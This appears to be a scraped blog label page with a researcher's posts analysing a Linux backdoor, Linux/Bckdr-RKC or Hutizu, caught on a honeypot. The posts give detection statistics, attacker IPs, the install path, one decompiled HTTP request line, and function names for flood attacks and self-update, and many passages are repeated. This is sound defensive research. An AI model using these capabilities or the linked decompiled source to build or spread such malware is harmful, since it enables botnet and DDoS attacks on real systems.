When typing Huituzi (the Chinese phonetic originally found in .ssyslog) into Google Translate, when performing phonetic typing for Chinese, huituzi translates into 灰兔子, which in Chinese apparently means "Gray Rabbit".
So, we now know the name of this amazing piece of malware.
According to Wikipedia, in Chinese literature, rabbits accompany Chang'e (the Chinese moon goddess) on the Moon. Also associated with the Chinese New Year (or Lunar New Year), rabbits are also one of the twelve celestial animals in the Chinese Zodiac for the Chinese calendar.
A very interesting note: This malware was discovered in 2011 - the Chinese year of the Metal Rabbit, or "Jīnshǔ tù" (金属兔).
The question remains - how deep does this rabbit hole go?
I'm updating all of my .ssyslog posts to include "Hutizu" since that is the official detection name.
Showing posts with label Linux/Bckdr-RKC. Show all posts
Showing posts with label Linux/Bckdr-RKC. Show all posts
Hutizu and Linux/Bckdr-RKC Detection Statistics
Let's take a look at current detection statistics for Linux/Bckdr-RKC.
The newer variant has been named the Hutizu backdoor by Antivirus vendors.
.xsyslog - The original file placed on my honeypot.
Commonly known as Linux/Bckdr-RKC or Linux/PKC
Metascan:
1/25 detection http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792
Fortinet detects as Linux/PKC.A!tr.bdr
VirusTotal:
0/43 detection https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1332284106/
VirScan:
3/36 detection http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html
Fortinet detects as Linux/PKC.A!tr.bdr
Kaspersky detects as Backdoor.Linux.PKC.a
Sophos detects as Linux/Bckdr-RKC
.ssyslog - The newer variant
Commonly known as "Hutizu"
Metascan:
3/25 detection http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0
ArcaVir detects as Linux.Hutizu.a
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
VirusTotal:
7/43 detection https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/
Comodo detects as UnclassifiedMalware
Emsisoft detects as Backdoor.Linux.Hutizu!IK
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A
VirScan:
8/36 detection http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html
a-squared detects as Backdoor.Linux.Hutizu!IK
ArcaVir detects as Linux.Hutizu.a
Comodo detects as UnclassifiedMalware
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A
This is good news, as it means anti-virus vendors are starting to detect this malware.
But the bad news is, only a small fraction of AV vendors are detecting it!
The newer variant has been named the Hutizu backdoor by Antivirus vendors.
.xsyslog - The original file placed on my honeypot.
Commonly known as Linux/Bckdr-RKC or Linux/PKC
Metascan:
1/25 detection http://www.metascan-online.com/results/ue9v7uz2yv9wvb36mdwr2s9hg3hss792
Fortinet detects as Linux/PKC.A!tr.bdr
VirusTotal:
0/43 detection https://www.virustotal.com/file/ce62318acfb28e7ad5c915b0bb7cbc256b5c682097d33d1a002ff856b21d7324/analysis/1332284106/
VirScan:
3/36 detection http://r.virscan.org/report/a6769c90a8c3d519201c6cdee60eea5b.html
Fortinet detects as Linux/PKC.A!tr.bdr
Kaspersky detects as Backdoor.Linux.PKC.a
Sophos detects as Linux/Bckdr-RKC
.ssyslog - The newer variant
Commonly known as "Hutizu"
Metascan:
3/25 detection http://www.metascan-online.com/results/szab3gp39d91byh3z3ebuz64utld97m0
ArcaVir detects as Linux.Hutizu.a
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
VirusTotal:
7/43 detection https://www.virustotal.com/file/414a142016cab43d85c7b85a61426f0d3e3c2e04b9c3a9b94d88925593aaf49b/analysis/1332284644/
Comodo detects as UnclassifiedMalware
Emsisoft detects as Backdoor.Linux.Hutizu!IK
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A
VirScan:
8/36 detection http://r.virscan.org/report/dac52b25964a8614bb02e119e828575c.html
a-squared detects as Backdoor.Linux.Hutizu!IK
ArcaVir detects as Linux.Hutizu.a
Comodo detects as UnclassifiedMalware
Fortinet detects as Linux/Hutizu.A!tr.bdr
Ikarus detects as Backdoor.Linux.Hutizu
Jiangmin detects as Backdoor/Linux.ab
Kaspersky detects as Backdoor.Linux.Hutizu.a
Sophos detects as Linux/Hutizu-A
This is good news, as it means anti-virus vendors are starting to detect this malware.
But the bad news is, only a small fraction of AV vendors are detecting it!
Hutizu Under the Hood
Been looking at the STRINGS result of .ssyslog... Which is now detected by a small number of AV vendors as "Hutizu"
http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt
A few interesting items jumped out at me.
http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ssyslog-strings.txt
A few interesting items jumped out at me.
Linux/Bckdr-RKC Delivery Method Analyzed
You can tell a lot about an attacker based upon their methods of attack.
-Automated attacks happen rapidly, with no time for typing
-Manual attacks happen slowly, as the attacker has to type commands
-Typos and misspellings indicate a manual attack
-Connection string will give away what kind of operating system the attacker is using
Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received.
-Automated attacks happen rapidly, with no time for typing
-Manual attacks happen slowly, as the attacker has to type commands
-Typos and misspellings indicate a manual attack
-Connection string will give away what kind of operating system the attacker is using
Let's take a look at both pieces of the Linux/Bckdr-RKC malware I've received.
Hutizu aka Linux/Bckdr-RKC and Duqu Links? Food for Thought.
I can't put my finger on it, but after looking at this article on the mystery of the Duqu Framework, and looking at my publicly posted decompilation of Linux/Bckdr-RKC, something strikes me as very familiar between the two.
I've sent this to Kaspersky, so we'll see if they get back to me on it.
Can you see any similarities? If so, please share!
UPDATE: The virus in question is now being detected by limited AV programs as the "Hutizu" backdoor.
I've sent this to Kaspersky, so we'll see if they get back to me on it.
Can you see any similarities? If so, please share!
UPDATE: The virus in question is now being detected by limited AV programs as the "Hutizu" backdoor.
UPDATED: Hutizu and Linux/Bckdr-RKC now have limited detection
UPDATE: The latest news on Linux/Bckdr-RKC (.xsyslog) and Hutizu (.ssyslog) can be viewed HERE, including newest detection statistics. Thanks!
It's been approximately 2 months since the original discovery of Linux/Bckdr-RKC
This Linux trojan is still undetected, according to VirusTotal.com
Virustotal: .xsyslog
Virustotal: .ssyslog
In fact, it would appear that even Sophos is no longer detecting this trojan.
I have resubmitted the file to multiple antivirus vendors, in hopes that they may pay attention to my submission this time.
For those who aren't familiar with this trojan, an anonymous internet user has taken the time to put together a Pastebin post highlighting my research on this trojan. http://pastebin.com/DwtX9dMd
I'd also like to take the time to point out that you can view the decompiled source of this trojan at my malware research Google code project: http://code.google.com/p/caffsec-malware-analysis/
Keep fighting the good fight.
It's been approximately 2 months since the original discovery of Linux/Bckdr-RKC
I have resubmitted the file to multiple antivirus vendors, in hopes that they may pay attention to my submission this time.
For those who aren't familiar with this trojan, an anonymous internet user has taken the time to put together a Pastebin post highlighting my research on this trojan. http://pastebin.com/DwtX9dMd
I'd also like to take the time to point out that you can view the decompiled source of this trojan at my malware research Google code project: http://code.google.com/p/caffsec-malware-analysis/
Keep fighting the good fight.
Following the Trail: Determining the Origins of Linux/Bckdr-RKC
It is already known that the two Linux/Bckdr-RKC variants I have received have both been hosted by 216.83.44.229. Furthermore, the first variant had a phone-home address of 216.83.44.226.
Both of these IP addresses are registered to the netblock owned by WIRELESS-ALARM.COM (not to be confused with the actual website wireless-alarm.com, which is registered to a different contact completely, and unrelated here).
Let's use what we already know to try to find the organization responsible for this malware.
Both of these IP addresses are registered to the netblock owned by WIRELESS-ALARM.COM (not to be confused with the actual website wireless-alarm.com, which is registered to a different contact completely, and unrelated here).
Let's use what we already know to try to find the organization responsible for this malware.
Chinese Origins in .ssyslog Decompiled - Linux/Bckdr-RKC and Hutizu
I have partially decompiled the second piece of malware which was similar to the original Linux/Bckdr-RKC dropped on my honeypot.
Update: .ssyslog is now detected as "Hutizu".
I am publicly posting the first section of this file to highlight my findings so far...
Update: The full decompiled source of both pieces of malware is now available at Google Code
The first part of this decompiled code which really stood out was a clear marker that this malware is definately of Chinese origin. This snippet of code is from the following function
This means the malware in question was most likely programmed by a native speaker of Chinese. Add to this the fact that the malware is hosted by a fake corporation in China, and that the previous version of this malware also phoned home to the same fake corporation, this all becomes very interesting.
Here are a few other function names from this latest version:
The malware has self-replication and automatic update capabilities.
I find this malware very disturbing.
What I find even more distrubing is the fact that since my submission of this malware to antivirus vendors, with the exception of Avira who believes this file is clean, none of the antivirus vendors have completed their analysis.
These two pieces of malware seem very professionally crafted with a clear purpose - to serve as a "cyber weapon".
Update: .ssyslog is now detected as "Hutizu".
I am publicly posting the first section of this file to highlight my findings so far...
Update: The full decompiled source of both pieces of malware is now available at Google Code
The first part of this decompiled code which really stood out was a clear marker that this malware is definately of Chinese origin. This snippet of code is from the following function
int autoupdate(char* url_address, char* local_to_file)Code:
The "Accept-Language" of zh-cn represents Traditional Chinese as the desired web browse language.L0805FF50( &_v3660, "GET /%s HTTP/1.1\nAccept: */*\nAccept-Language: zh-cn\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\nHost: %s:%d\nConnection: Close\n\n", &_v2380);
This means the malware in question was most likely programmed by a native speaker of Chinese. Add to this the fact that the malware is hosted by a fake corporation in China, and that the previous version of this malware also phoned home to the same fake corporation, this all becomes very interesting.
Here are a few other function names from this latest version:
- copy_myself(const char* name)
- autostart(const char* inser_to_file)
- int SendSevMonitor()
- int SendServerPack()
- GetNetPackets(long long unsigned int* lNetOut, long long unsigned int* lPacketOut)
- int moniter(char* host)
- int udpflood(_Unknown_base* ThreadData)
- int synflood(_Unknown_base* ThreadData)
- int synbigpacket(_Unknown_base* ThreadData)
- int ackflood(_Unknown_base* ThreadData)
- int ackbigpacket(_Unknown_base* ThreadData)
- GetStructureDnsPacket(char* QueryDomain, char* QueryData, int* nQueryData)
- int dnsflood(_Unknown_base* ThreadData)
- int more_ip_dns_test(_Unknown_base* ThreadData)
- int autoupdate(char* url_address, char* local_to_file)
- int get_online_ip(char* domain, char* return_ip)
- int parse_dns_response(char* return_ip)
- parse_dns_name(unsigned char* chunk, unsigned char* ptr, char* out, int* len)
- send_dns_request(const char* dns_name)
- connect_to_server()
The malware has self-replication and automatic update capabilities.
I find this malware very disturbing.
What I find even more distrubing is the fact that since my submission of this malware to antivirus vendors, with the exception of Avira who believes this file is clean, none of the antivirus vendors have completed their analysis.
These two pieces of malware seem very professionally crafted with a clear purpose - to serve as a "cyber weapon".
Linux/Bckdr-RKC: A New Variant Appears
Someone was busy this Christmas.
A new variant of Linux/Bckdr-RKC has been placed on my honeypot.
Unfortunately detections by Sophos do not detect this variant, so I've sent it back to them for analysis.
I have posted the strings from the unpacked malware, as well as a diff between the strings of the old version and new version.
I will post updates as I can.
A new variant of Linux/Bckdr-RKC has been placed on my honeypot.
Unfortunately detections by Sophos do not detect this variant, so I've sent it back to them for analysis.
I have posted the strings from the unpacked malware, as well as a diff between the strings of the old version and new version.
I will post updates as I can.
Linux/Bckdr-RKC Initial Analysis
A malicious user dropped off a VERY interesting piece of malware on my honeypot today with the filename ".xsyslog"
This piece of malware was previously undetected, and many kudos to Sophos for being the first to confirm my findings that the software was malicious.
So far, I have been able to determine the following:
This is a UPX packed Linux ELF which appears to have been around since late November 2011, according to internet searches.
The malware is installed from a compromised system after cracking a SSH server's root password, in the path /etc/.xsyslog
The malware is downloaded from an IP address which appears to be hosted in Hong Kong by a fake corporation: 216.83.44.229 port 99
It phones home to an IP address which appears to be hosted by the same fake corporation: 216.83.44.226 port 81
I have uploaded all relevant strings within the unpacked file to Pastebin.
I will provide additional details as I find/receive them. This malware has been forwarded to US-CERT, as well as multiple anti-virus vendors.
Track current AV coverage at http://md5.virscan.org/58c23ca549c941f0d44b35fa31d77011
Related Reading:
Sophos Whitepaper Protection for Mac and Linux Computers: Genuine Need or Nice to Have?
This piece of malware was previously undetected, and many kudos to Sophos for being the first to confirm my findings that the software was malicious.
So far, I have been able to determine the following:
This is a UPX packed Linux ELF which appears to have been around since late November 2011, according to internet searches.
The malware is installed from a compromised system after cracking a SSH server's root password, in the path /etc/.xsyslog
The malware is downloaded from an IP address which appears to be hosted in Hong Kong by a fake corporation: 216.83.44.229 port 99
It phones home to an IP address which appears to be hosted by the same fake corporation: 216.83.44.226 port 81
I have uploaded all relevant strings within the unpacked file to Pastebin.
I will provide additional details as I find/receive them. This malware has been forwarded to US-CERT, as well as multiple anti-virus vendors.
Track current AV coverage at http://md5.virscan.org/58c23ca549c941f0d44b35fa31d77011
Related Reading:
Sophos Whitepaper Protection for Mac and Linux Computers: Genuine Need or Nice to Have?
Subscribe to:
Posts (Atom)